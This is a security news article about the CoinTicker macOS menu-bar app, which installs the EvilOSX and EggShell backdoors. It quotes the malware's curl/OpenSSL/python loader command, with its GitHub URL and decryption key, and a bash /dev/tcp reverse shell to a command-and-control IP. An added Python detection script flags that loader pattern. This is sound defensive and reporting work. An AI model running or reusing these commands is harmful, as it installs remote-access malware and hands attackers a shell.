CoinTicker, a Mac menu-bar app that presents the latest prices of many cryptocurrencies, has been found installing two backdoors on Mac computers. According to a Malwarebytes blog post, a forum contributor, 1vladimir, observed that an application called CoinTicker had been installing backdoors on systems after download.
The CoinTicker App Behaviors
The blog further explained that the CoinTicker app at first seems a reliable application that could well be useful to people who have invested in cryptocurrencies. Once downloaded, the app places an icon in the menu bar that shows the current price of Bitcoin. The app’s options let the user modify the display to show data about a broad range of cryptocurrencies, such as Bitcoin, Ethereum, and Monero.
This functionality appears legitimate, but in reality the app is installing two backdoors known as EvilOSX and EggShell. Thanks to the app’s seemingly legitimate behavior, the backdoors are installed without ever prompting for root authentication. When a user launches the app, it downloads and installs parts of two different open-source backdoors, EvilOSX and EggShell. The app runs the following shell command to download a custom-compiled version of the EggShell server for macOS:
nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py
The first part of the command downloads an encrypted file from a GitHub page belonging to a user named “youarenick” and stores it as a hidden file called .info.enc in /private/tmp/. Next, it uses OpenSSL to decrypt that file into a hidden Python file called .info.py. Finally, it runs the resulting Python script.
The .info.py script performs several tasks. First, it opens a reverse shell connection to a command-and-control server using the following command:
nohup bash &> /dev/tcp/220.127.116.11/2280 0>&1
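The two commands above give a defender a concrete loader shape to look for in process command-line telemetry: a download to a hidden file under /tmp, an OpenSSL decryption that yields a script, an interpreter launched on that script, and a bash redirection to /dev/tcp. The following script is an added detection example, not code from the article or from Malwarebytes; it splits each logged command line into its stages and names the stage patterns that fire. The log lines are constructed for the example (the first two are the commands quoted in the article, the rest are benign contrasts), and the detection names and severity levels are this example's own.

```python
"""Flag shell command lines matching the staged-loader pattern described in
the CoinTicker write-up. Added detection example; not the article's code."""
import os
import re
import shlex

# Constructed sample of process-execution log lines. Lines 1-2 are the commands
# quoted in the article; lines 3-5 are constructed benign commands for contrast.
SAMPLE_LOG = [
    "nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; "
    "openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py",
    "nohup bash &> /dev/tcp/220.127.116.11/2280 0>&1",
    "curl -L -o /Users/alice/Downloads/report.pdf https://example.com/report.pdf",
    "python /Users/alice/projects/app/main.py",
    "openssl enc -aes-256-cbc -d -in backup.tar.enc -out backup.tar -k placeholder",
]

# Wrappers that precede the real command and are skipped when identifying it.
WRAPPERS = {"nohup", "sudo", "env", "exec"}
# Flags under which each downloader names its output file.
OUTPUT_FLAGS = {"curl": {"-o", "--output"}, "wget": {"-O", "--output-document"}}
INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "bash", "sh", "zsh", "osascript"}
SCRIPT_EXT = (".py", ".sh", ".pl", ".rb", ".scpt")

TMP_PATH = re.compile(r"^/(?:private/)?tmp/")
HIDDEN_TMP = re.compile(r"^/(?:private/)?tmp/\.")          # dot-file under /tmp
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+")      # bash network redirection
STAGE_SEP = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")          # ; && || |


def _stages(line):
    """Yield the token list of each stage of a command line, minus wrappers."""
    for stage in STAGE_SEP.split(line):
        try:
            tokens = shlex.split(stage)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            tokens = stage.split()
        while tokens and tokens[0] in WRAPPERS:
            tokens.pop(0)
        if tokens:
            yield tokens


def _flag_value(tokens, flags):
    """Return the argument that follows the first of the given flags, or None."""
    for i, tok in enumerate(tokens[:-1]):
        if tok in flags:
            return tokens[i + 1]
    return None


def analyze_command(line):
    """Return the detection names (example-defined) that fire on one command line."""
    findings = []
    for tokens in _stages(line):
        cmd = os.path.basename(tokens[0])
        if cmd in OUTPUT_FLAGS:
            out = _flag_value(tokens, OUTPUT_FLAGS[cmd])
            if out and HIDDEN_TMP.match(out):
                findings.append("hidden_tmp_download")
        elif cmd == "openssl" and len(tokens) > 1 and tokens[1] == "enc" and "-d" in tokens:
            out = _flag_value(tokens, {"-out"})
            if out and (TMP_PATH.match(out) or out.endswith(SCRIPT_EXT)):
                findings.append("decrypt_to_script")
        elif cmd in INTERPRETERS:
            args = [t for t in tokens[1:] if not t.startswith("-")]
            if any(TMP_PATH.match(a) for a in args):
                findings.append("interpreter_from_tmp")
    if DEV_TCP.search(line):
        findings.append("dev_tcp_reverse_shell")
    return findings


def scan_log(lines):
    """Return (line, findings, severity) for each line with at least one finding.

    One matching stage is 'medium'; two or more distinct stages chained in a
    single command line, the loader shape seen here, is 'high'.
    """
    results = []
    for line in lines:
        findings = analyze_command(line)
        if findings:
            severity = "high" if len(set(findings)) >= 2 else "medium"
            results.append((line, findings, severity))
    return results


if __name__ == "__main__":
    for line, findings, severity in scan_log(SAMPLE_LOG):
        print(f"[{severity}] {', '.join(findings)}: {line[:70]}")
```

Each rule alone is noisy (administrators do decrypt files with OpenSSL and do run scripts from /tmp), which is why the scoring only escalates when several stages appear in one command line; a /dev/tcp redirection is rare enough in legitimate automation to be worth reviewing on its own.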
The blog further explained that the attacker’s purpose behind this app has not yet been determined. Since the malware is spread through a cryptocurrency app, however, it seems likely that it is intended to gain access to users’ cryptocurrency wallets in order to steal coins.
This app was likely never legitimate, since it is distributed via a domain named coin-sticker.com, which was registered only a few months ago, on July 13.
About EvilOSX and EggShell
EvilOSX is malware posted on GitHub that gives attackers a highly customizable attack tool running on both older and newer versions of macOS. Anyone can download the project. It is a remote access trojan, a program that can be used to spy on a macOS user by accessing things like the system’s webcam, microphone, and screenshot service. It also lets attackers download personal files without the victim’s knowledge.
EggShell is post-exploitation malware written in Python. It gives its user a command-line session with additional functionality, including uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, persistence, privilege escalation, password retrieval, and much more.
The post concluded that the notable thing about CoinTicker is that it requires only normal user permissions; root permissions are not needed. There is often an inaccurate over-emphasis on malware’s need for root privileges, but this malware is a classic illustration that malware does not need such privileges to pose a high risk.
Just a few days ago, the McAfee Labs Threat Report for September 2018 found that malware that mines cryptocurrency using a PC’s resources roughly doubled in Q2 2018, an 85% increase. McAfee’s research also found an increase in malware attacks targeting mobile devices. A growing trend toward mobile adoption has been seen across the sector, as both CoinMarketCap and Binance Info have released apps for users to access market data on mobile devices. The new Zcash (ZEC) ‘Sapling’ update will reduce the computational power needed for the zk-SNARKs cryptography it uses, which will make transactions from phones a reality.
The notoriety and growing real-world importance of cryptocurrencies are also attracting cybercriminal attention. Crypto-mining malware, software created to mine cryptocurrency illicitly on victims’ machines, nearly doubled in the second quarter of the year, and attackers may be building malware specifically to target mobile devices.